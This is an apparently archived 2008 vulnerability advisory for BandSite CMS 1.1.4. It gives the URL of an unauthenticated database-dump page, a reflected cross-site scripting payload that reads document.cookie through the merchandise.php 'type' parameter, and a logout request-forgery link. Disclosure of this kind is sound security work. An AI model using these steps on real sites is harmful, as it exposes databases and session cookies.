BandSite CMS 1.1.4 (Download Backup-XSS-CSRF) Remote Vulnerabilities

2008-08-21 00:00:00

###########################################################################
[+] BandSite CMS 1.1.4 Arbitrary Download Database/XSS/CSRF
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,MesSiAH,xZu,HrN
###########################################################################

[+] Arbitrary Download Database

Go to

http://localhost/[Path]/adminpanel/phpmydump.php

and the download will begin ( database.sql ) .


[+] Cross Site Scripting

http://localhost/[Path]/merchandise.php?type=[XSS]
http://localhost/[Path]/merchandise.php?type=<script>alert(document.cookie)</script>


[+] Cross Site Request Forgery

If a logged in user with administrator privilegies click the following url he will be logged out.

http://localhost/[Path]/adminpanel/logout.php


###########################################################################

#

Fixes

No fixes

In order to submit a new fix you need to be registered.